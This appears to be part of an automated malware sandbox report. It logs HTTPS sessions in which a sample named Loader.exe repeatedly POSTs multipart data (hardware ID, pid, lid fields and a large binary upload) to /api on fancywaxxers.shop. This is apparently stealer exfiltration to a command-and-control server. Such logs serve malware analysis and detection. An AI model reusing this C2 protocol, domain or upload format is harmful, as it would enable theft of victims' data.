                                                                                        2024-12-31 16:38:38 UTC1369INData Raw: 64 7a 4a 6f 44 54 61 31 75 47 74 73 64 48 70 43 42 6e 4f 47 4e 41 46 44 75 68 78 31 68 49 5a 63 2f 43 50 33 31 68 32 6a 68 75 73 39 4c 43 38 5a 65 72 2b 7a 4c 44 73 78 4f 51 74 46 64 5a 52 39 56 51 79 63 46 57 79 43 32 68 53 39 50 62 4c 43 55 61 53 48 70 6d 39 74 4a 68 35 7a 75 4c 6b 6f 4f 7a 64 72 52 41 4e 67 6a 44 41 48 58 72 63 54 59 6f 4f 4d 51 2f 34 6b 2b 74 41 64 73 59 4c 6d 4e 43 5a 6d 57 6a 61 31 72 47 74 73 64 46 70 53 45 33 69 4c 4d 52 74 48 76 42 74 78 67 35 45 4f 73 32 4c 74 33 41 44 6a 30 2f 41 6e 4f 69 45 4c 4f 4b 76 30 4c 44 68 30 49 51 55 44 65 34 6f 36 43 30 4b 76 48 57 47 42 6a 6b 66 30 4a 76 54 59 45 61 65 50 34 54 49 75 4b 68 39 78 73 62 73 76 50 54 70 77 53 6b 55 38 7a 44 6f 56 44 4f 56 59 52 70 57 43 51 76 42 69 34 35 55 49 34 34 7a
                                                                                        Data Ascii: dzJoDTa1uGtsdHpCBnOGNAFDuhx1hIZc/CP31h2jhus9LC8Zer+zLDsxOQtFdZR9VQycFWyC2hS9PbLCUaSHpm9tJh5zuLkoOzdrRANgjDAHXrcTYoOMQ/4k+tAdsYLmNCZmWja1rGtsdFpSE3iLMRtHvBtxg5EOs2Lt3ADj0/AnOiELOKv0LDh0IQUDe4o6C0KvHWGBjkf0JvTYEaeP4TIuKh9xsbsvPTpwSkU8zDoVDOVYRpWCQvBi45UI44z
                                                                                        2024-12-31 16:38:38 UTC1369INData Raw: 6c 51 75 38 70 51 67 49 6a 46 2b 55 30 64 48 6a 7a 4d 44 53 36 74 59 65 4c 48 50 44 76 49 34 76 49 4d 6f 75 73 76 68 4f 32 31 2b 56 47 4f 31 74 43 77 75 49 6e 35 4a 46 48 6d 42 4d 53 39 44 75 67 35 6b 67 59 4a 66 39 47 37 33 31 6c 48 74 79 2b 45 76 62 58 35 55 57 62 57 69 4b 42 73 33 61 45 78 46 50 4d 77 36 47 77 7a 6c 57 46 6e 4f 6b 30 33 74 49 66 50 4b 4c 2b 50 54 2f 77 6c 74 4c 51 4a 78 6f 72 63 39 50 7a 6c 31 56 44 73 79 31 47 6c 66 48 75 39 4b 4e 5a 48 42 55 63 4a 73 76 4e 70 52 2b 37 4c 2f 64 7a 74 6d 54 43 54 38 39 44 6c 30 62 44 6b 43 42 6d 43 65 4f 77 35 61 76 6c 39 5a 73 4b 5a 59 39 79 58 73 33 41 61 73 79 36 68 33 49 6d 5a 4d 54 2f 4b 39 4c 43 38 6c 62 30 67 56 64 63 77 43 51 77 79 6c 57 44 2f 4f 74 45 33 7a 4c 50 76 4e 41 4f 36 73 38 44 30 71
                                                                                        Data Ascii: lQu8pQgIjF+U0dHjzMDS6tYeLHPDvI4vIMousvhO21+VGO1tCwuIn5JFHmBMS9Dug5kgYJf9G731lHty+EvbX5UWbWiKBs3aExFPMw6GwzlWFnOk03tIfPKL+PT/wltLQJxorc9Pzl1VDsy1GlfHu9KNZHBUcJsvNpR+7L/dztmTCT89Dl0bDkCBmCeOw5avl9ZsKZY9yXs3Aasy6h3ImZMT/K9LC8lb0gVdcwCQwylWD/OtE3zLPvNAO6s8D0q
                                                                                        2024-12-31 16:38:38 UTC1369INData Raw: 37 30 5a 58 51 68 63 6b 6b 44 66 35 6c 79 48 46 71 2b 44 6d 44 43 69 56 2f 77 4c 72 7a 6b 58 2b 4f 54 70 6d 39 74 45 78 64 34 76 4c 4d 39 4a 58 6c 5a 54 67 6c 78 67 44 77 4b 44 50 4e 59 59 63 37 5a 48 62 4e 69 2b 4d 70 52 2b 39 75 30 62 48 68 31 51 79 62 67 71 32 55 74 64 47 38 46 58 53 44 43 66 52 38 4d 35 56 67 67 6a 5a 4e 63 2b 79 48 71 32 46 61 64 74 65 63 36 49 6d 6f 61 66 62 4b 7a 4f 79 49 76 4e 55 30 47 61 4a 59 44 4d 32 65 78 48 6d 43 55 68 6b 6a 62 41 72 79 56 55 61 7a 4c 76 67 35 74 62 6c 52 4a 2f 50 51 7a 64 47 77 35 63 41 5a 38 67 6a 6f 62 58 66 41 77 52 4c 53 37 44 4e 45 6c 36 5a 6b 6c 70 4a 76 33 50 43 41 71 56 44 6a 79 73 6d 74 73 5a 44 63 46 41 57 50 4d 5a 56 30 65 35 6b 30 30 32 64 45 63 34 6d 7a 6c 6d 77 66 6a 30 37 52 35 62 54 52 55 4c
                                                                                        Data Ascii: 70ZXQhckkDf5lyHFq+DmDCiV/wLrzkX+OTpm9tExd4vLM9JXlZTglxgDwKDPNYYc7ZHbNi+MpR+9u0bHh1Qybgq2UtdG8FXSDCfR8M5VggjZNc+yHq2Fadtec6ImoafbKzOyIvNU0GaJYDM2exHmCUhkjbAryVUazLvg5tblRJ/PQzdGw5cAZ8gjobXfAwRLS7DNEl6ZklpJv3PCAqVDjysmtsZDcFAWPMZV0e5k002dEc4mzlmwfj07R5bTRUL
                                                                                        2024-12-31 16:38:38 UTC1369INData Raw: 73 5a 7a 63 46 46 7a 4c 55 66 55 70 43 73 42 6c 6b 67 49 4a 63 37 79 54 2f 7a 52 4c 6b 74 64 67 53 49 43 73 52 65 4c 57 4b 46 52 55 2b 61 55 67 4b 64 63 34 64 43 6c 71 2b 4a 6c 6d 35 6b 45 6e 74 59 4e 72 59 42 36 44 4c 71 48 63 31 5a 6b 77 32 6b 37 34 37 4f 54 74 2b 42 79 56 31 6d 6a 35 4e 41 76 30 63 4a 39 62 42 61 2f 41 76 2b 64 55 57 34 61 72 73 4a 79 41 70 45 7a 53 53 73 7a 30 33 64 44 63 46 43 54 4c 55 66 51 78 47 72 52 56 6f 69 63 31 4a 35 79 57 38 6c 56 47 74 79 37 35 33 4c 43 77 45 65 37 32 7a 5a 7a 49 36 64 77 55 61 50 4a 56 39 47 77 7a 6c 53 79 6e 4f 6b 77 36 6c 59 72 76 59 41 37 47 4e 35 53 45 75 59 53 70 49 6e 36 59 73 4a 44 63 37 64 41 68 32 6d 69 67 4f 58 4c 6f 6d 57 61 4f 54 53 65 30 68 76 75 6f 48 6f 49 76 6f 4d 47 31 6f 56 47 37 79 37 47
                                                                                        Data Ascii: sZzcFFzLUfUpCsBlkgIJc7yT/zRLktdgSICsReLWKFRU+aUgKdc4dClq+Jlm5kEntYNrYB6DLqHc1Zkw2k747OTt+ByV1mj5NAv0cJ9bBa/Av+dUW4arsJyApEzSSsz03dDcFCTLUfQxGrRVoic1J5yW8lVGty753LCwEe72zZzI6dwUaPJV9GwzlSynOkw6lYrvYA7GN5SEuYSpIn6YsJDc7dAh2migOXLomWaOTSe0hvuoHoIvoMG1oVG7y7G


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        2192.168.2.549792104.21.80.14436472C:\Users\user\Desktop\Loader.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-12-31 16:38:39 UTC277OUTPOST /api HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Content-Type: multipart/form-data; boundary=U5BOA8BVM9R9
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                        Content-Length: 12804
                                                                                        Host: fancywaxxers.shop
                                                                                        2024-12-31 16:38:39 UTC12804OUTData Raw: 2d 2d 55 35 42 4f 41 38 42 56 4d 39 52 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 31 38 45 32 34 35 30 30 35 41 43 30 37 30 35 35 43 38 32 41 38 31 34 38 43 36 45 35 34 34 30 30 0d 0a 2d 2d 55 35 42 4f 41 38 42 56 4d 39 52 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 55 35 42 4f 41 38 42 56 4d 39 52 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 79 61 75 36 4e 61 2d 2d 35 38 30 39 32 32 34 31 30 33 0d 0a 2d 2d 55 35 42 4f 41 38 42 56 4d
                                                                                        Data Ascii: --U5BOA8BVM9R9Content-Disposition: form-data; name="hwid"18E245005AC07055C82A8148C6E54400--U5BOA8BVM9R9Content-Disposition: form-data; name="pid"2--U5BOA8BVM9R9Content-Disposition: form-data; name="lid"yau6Na--5809224103--U5BOA8BVM
                                                                                        2024-12-31 16:38:40 UTC1137INHTTP/1.1 200 OK
                                                                                        Date: Tue, 31 Dec 2024 16:38:40 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: close
                                                                                        Set-Cookie: PHPSESSID=f9b2si32rm53d66d3iflvcqjq8; expires=Sat, 26 Apr 2025 10:25:18 GMT; Max-Age=9999999; path=/
                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                        Pragma: no-cache
                                                                                        X-Frame-Options: DENY
                                                                                        X-Content-Type-Options: nosniff
                                                                                        X-XSS-Protection: 1; mode=block
                                                                                        cf-cache-status: DYNAMIC
                                                                                        vary: accept-encoding
                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1uSzain6xZK%2Bw0RGLrY4W6mhOJ2ayksJqjaM4yAT75qw4Qo2pIe%2FS%2Fx%2BmLrAEM9i1GxqjgrMAsefTFelMZCZZJPE3oREMpZs9juRQWsv%2Bc3dRKoE28eQhCIymwD7GKbn1VS7nw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 8fabb381dda4c443-EWR
                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1598&min_rtt=1588&rtt_var=616&sent=13&recv=18&lost=0&retrans=0&sent_bytes=2842&recv_bytes=13739&delivery_rate=1745367&cwnd=244&unsent_bytes=0&cid=097bdb176374d005&ts=837&x=0"
                                                                                        2024-12-31 16:38:40 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                        Data Ascii: fok 8.46.123.189
                                                                                        2024-12-31 16:38:40 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                        Data Ascii: 0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        3192.168.2.549800104.21.80.14436472C:\Users\user\Desktop\Loader.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-12-31 16:38:41 UTC279OUTPOST /api HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Content-Type: multipart/form-data; boundary=DESGX3OQDDC0V3
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                        Content-Length: 15058
                                                                                        Host: fancywaxxers.shop
                                                                                        2024-12-31 16:38:41 UTC15058OUTData Raw: 2d 2d 44 45 53 47 58 33 4f 51 44 44 43 30 56 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 31 38 45 32 34 35 30 30 35 41 43 30 37 30 35 35 43 38 32 41 38 31 34 38 43 36 45 35 34 34 30 30 0d 0a 2d 2d 44 45 53 47 58 33 4f 51 44 44 43 30 56 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 44 45 53 47 58 33 4f 51 44 44 43 30 56 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 79 61 75 36 4e 61 2d 2d 35 38 30 39 32 32 34 31 30 33 0d 0a 2d 2d 44 45 53
                                                                                        Data Ascii: --DESGX3OQDDC0V3Content-Disposition: form-data; name="hwid"18E245005AC07055C82A8148C6E54400--DESGX3OQDDC0V3Content-Disposition: form-data; name="pid"2--DESGX3OQDDC0V3Content-Disposition: form-data; name="lid"yau6Na--5809224103--DES
                                                                                        2024-12-31 16:38:42 UTC1143INHTTP/1.1 200 OK
                                                                                        Date: Tue, 31 Dec 2024 16:38:42 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: close
                                                                                        Set-Cookie: PHPSESSID=stjic5us281qgi57vp31k4emca; expires=Sat, 26 Apr 2025 10:25:21 GMT; Max-Age=9999999; path=/
                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                        Pragma: no-cache
                                                                                        X-Frame-Options: DENY
                                                                                        X-Content-Type-Options: nosniff
                                                                                        X-XSS-Protection: 1; mode=block
                                                                                        cf-cache-status: DYNAMIC
                                                                                        vary: accept-encoding
                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3pr7PRBBv%2BQg06yH8GXP9a1Zfdg%2BwF7ckLUQmfI5oL5%2B8%2FaocUpQI8o8EOirgtZHHmeRqlWLCsut63TYVCNIS9%2Brtq%2BqLne661I%2BHcLbFsApoRmzGwiyc%2BSF3ppLl6ZlfjdlWg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 8fabb38ae9dd0f36-EWR
                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1527&min_rtt=1521&rtt_var=583&sent=8&recv=20&lost=0&retrans=0&sent_bytes=2843&recv_bytes=15995&delivery_rate=1856325&cwnd=231&unsent_bytes=0&cid=cff969e58c7a6f73&ts=1568&x=0"
                                                                                        2024-12-31 16:38:42 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                        Data Ascii: fok 8.46.123.189
                                                                                        2024-12-31 16:38:42 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                        Data Ascii: 0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        4192.168.2.549815104.21.80.14436472C:\Users\user\Desktop\Loader.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-12-31 16:38:43 UTC273OUTPOST /api HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Content-Type: multipart/form-data; boundary=OH8EJ5QT
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                        Content-Length: 20512
                                                                                        Host: fancywaxxers.shop
                                                                                        2024-12-31 16:38:43 UTC15331OUTData Raw: 2d 2d 4f 48 38 45 4a 35 51 54 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 31 38 45 32 34 35 30 30 35 41 43 30 37 30 35 35 43 38 32 41 38 31 34 38 43 36 45 35 34 34 30 30 0d 0a 2d 2d 4f 48 38 45 4a 35 51 54 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 4f 48 38 45 4a 35 51 54 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 79 61 75 36 4e 61 2d 2d 35 38 30 39 32 32 34 31 30 33 0d 0a 2d 2d 4f 48 38 45 4a 35 51 54 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73
                                                                                        Data Ascii: --OH8EJ5QTContent-Disposition: form-data; name="hwid"18E245005AC07055C82A8148C6E54400--OH8EJ5QTContent-Disposition: form-data; name="pid"3--OH8EJ5QTContent-Disposition: form-data; name="lid"yau6Na--5809224103--OH8EJ5QTContent-Dis
                                                                                        2024-12-31 16:38:43 UTC5181OUTData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 80 75 6e 20 0a e6 d6 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 ce 0d 46 c1 dc ba 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d6 b9 81 28 98 5b f7 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 3a 37 18 05 73 eb 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 58 e7 06 a2 60 6e dd 4f 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 eb dc 60 14 cc ad fb 69 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 9d 1b 88 82
                                                                                        Data Ascii: un 4F([:7s~X`nO`i`
                                                                                        2024-12-31 16:38:44 UTC1131INHTTP/1.1 200 OK
                                                                                        Date: Tue, 31 Dec 2024 16:38:44 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: close
                                                                                        Set-Cookie: PHPSESSID=ipb620qrfmml82a92fm6q252c7; expires=Sat, 26 Apr 2025 10:25:22 GMT; Max-Age=9999999; path=/
                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                        Pragma: no-cache
                                                                                        X-Frame-Options: DENY
                                                                                        X-Content-Type-Options: nosniff
                                                                                        X-XSS-Protection: 1; mode=block
                                                                                        cf-cache-status: DYNAMIC
                                                                                        vary: accept-encoding
                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=trqbCUsEtGMtiGScd2gnAu5zqTcRCXTGnvfep0evYK7IThJw%2BfO5xbAbW8sS4o8enSYlwUpQNXEH8rm0WWJpPJeuCEm6%2Fqi89zG0JWSRuzeUda5bmOB6jj71eKeJrvZv72fYUA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 8fabb3999bba8c0f-EWR
                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1949&min_rtt=1946&rtt_var=735&sent=11&recv=25&lost=0&retrans=0&sent_bytes=2842&recv_bytes=21465&delivery_rate=1482233&cwnd=223&unsent_bytes=0&cid=19197222feb7b222&ts=762&x=0"
                                                                                        2024-12-31 16:38:44 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                        Data Ascii: fok 8.46.123.189
                                                                                        2024-12-31 16:38:44 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                        Data Ascii: 0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        5192.168.2.549827104.21.80.14436472C:\Users\user\Desktop\Loader.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-12-31 16:38:45 UTC273OUTPOST /api HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Content-Type: multipart/form-data; boundary=TMY17K7WU
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                        Content-Length: 1204
                                                                                        Host: fancywaxxers.shop
                                                                                        2024-12-31 16:38:45 UTC1204OUTData Raw: 2d 2d 54 4d 59 31 37 4b 37 57 55 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 31 38 45 32 34 35 30 30 35 41 43 30 37 30 35 35 43 38 32 41 38 31 34 38 43 36 45 35 34 34 30 30 0d 0a 2d 2d 54 4d 59 31 37 4b 37 57 55 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 54 4d 59 31 37 4b 37 57 55 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 79 61 75 36 4e 61 2d 2d 35 38 30 39 32 32 34 31 30 33 0d 0a 2d 2d 54 4d 59 31 37 4b 37 57 55 0d 0a 43 6f 6e 74 65 6e 74
                                                                                        Data Ascii: --TMY17K7WUContent-Disposition: form-data; name="hwid"18E245005AC07055C82A8148C6E54400--TMY17K7WUContent-Disposition: form-data; name="pid"1--TMY17K7WUContent-Disposition: form-data; name="lid"yau6Na--5809224103--TMY17K7WUContent
                                                                                        2024-12-31 16:38:46 UTC1135INHTTP/1.1 200 OK
                                                                                        Date: Tue, 31 Dec 2024 16:38:46 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: close
                                                                                        Set-Cookie: PHPSESSID=1nogc6hsb5c2d4qi2sojfv94ki; expires=Sat, 26 Apr 2025 10:25:24 GMT; Max-Age=9999999; path=/
                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                        Pragma: no-cache
                                                                                        X-Frame-Options: DENY
                                                                                        X-Content-Type-Options: nosniff
                                                                                        X-XSS-Protection: 1; mode=block
                                                                                        cf-cache-status: DYNAMIC
                                                                                        vary: accept-encoding
                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QsE0LSqoqNLHmtxgtgI0cU6GMX8nTLBaCbw0wAb0RNwo0BJCAdF7QtVzgF1mdv4xS0f%2FHBES3ydtZgKVUol%2FxHknRj%2BLfSNg%2FYXRYf4NVeRf3tNbkGN7u%2BM13QAbZqQKagyjRg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 8fabb3a5bad1c443-EWR
                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1654&min_rtt=1651&rtt_var=625&sent=4&recv=7&lost=0&retrans=0&sent_bytes=2842&recv_bytes=2113&delivery_rate=1743283&cwnd=244&unsent_bytes=0&cid=be9f7f3656f6153d&ts=1009&x=0"
                                                                                        2024-12-31 16:38:46 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                        Data Ascii: fok 8.46.123.189
                                                                                        2024-12-31 16:38:46 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                        Data Ascii: 0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        6192.168.2.549842104.21.80.14436472C:\Users\user\Desktop\Loader.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-12-31 16:38:47 UTC278OUTPOST /api HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Content-Type: multipart/form-data; boundary=0MBIVEZHVYB9
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                        Content-Length: 570460
                                                                                        Host: fancywaxxers.shop
                                                                                        2024-12-31 16:38:47 UTC15331OUTData Raw: 2d 2d 30 4d 42 49 56 45 5a 48 56 59 42 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 31 38 45 32 34 35 30 30 35 41 43 30 37 30 35 35 43 38 32 41 38 31 34 38 43 36 45 35 34 34 30 30 0d 0a 2d 2d 30 4d 42 49 56 45 5a 48 56 59 42 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 30 4d 42 49 56 45 5a 48 56 59 42 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 79 61 75 36 4e 61 2d 2d 35 38 30 39 32 32 34 31 30 33 0d 0a 2d 2d 30 4d 42 49 56 45 5a 48 56
                                                                                        Data Ascii: --0MBIVEZHVYB9Content-Disposition: form-data; name="hwid"18E245005AC07055C82A8148C6E54400--0MBIVEZHVYB9Content-Disposition: form-data; name="pid"1--0MBIVEZHVYB9Content-Disposition: form-data; name="lid"yau6Na--5809224103--0MBIVEZHV
                                                                                        2024-12-31 16:38:47 UTC15331OUTData Raw: 5c ef 22 79 13 e0 05 c9 6d f5 0c 77 21 9b fe 50 75 67 5a d6 5b d1 32 b4 26 2e 55 92 c1 1c 7a 37 a8 f4 92 ab 1b 4b 59 bf a7 64 9d ff 0d 77 5c 3b b3 c1 47 05 74 3c 66 04 be 51 a9 51 16 0f db b0 72 e6 cf f7 db 34 6e 16 74 a1 29 47 42 1a e7 8a 76 b8 f4 0d 7c 41 13 30 52 c5 a0 2d dc c8 2c 04 29 b7 16 4c ee 35 b2 15 44 b6 0b 02 a1 fc 49 7c c2 2f 31 07 77 fc 39 d0 b4 4a a7 2f 5e 2d e2 97 89 5e f4 c8 78 38 64 27 71 68 2c f3 64 66 46 29 d4 2e 90 0c ae fc 3e e5 b5 78 5d c0 dc cd 88 26 b4 be 6f f5 b4 5a 72 95 6b 28 cc f0 96 45 ad 88 f1 4e 74 bb 5f 17 e1 12 36 fd 15 c6 ff 92 e0 5f 5d 4a a2 27 68 80 49 f0 dc 34 11 31 e4 f0 5e 31 e9 39 4a 2c 20 1d 64 06 f3 06 3b 8b d0 cd ed dd aa ce 90 89 04 b8 d5 1a 99 26 81 f5 4c 3b 45 b0 30 7f da 02 84 0e 32 dd 6e 2a 38 ca 7d 31 24
                                                                                        Data Ascii: \"ymw!PugZ[2&.Uz7KYdw\;Gt<fQQr4nt)GBv|A0R-,)L5DI|/1w9J/^-^x8d'qh,dfF).>x]&oZrk(ENt_6_]J'hI41^19J, d;&L;E02n*8}1$
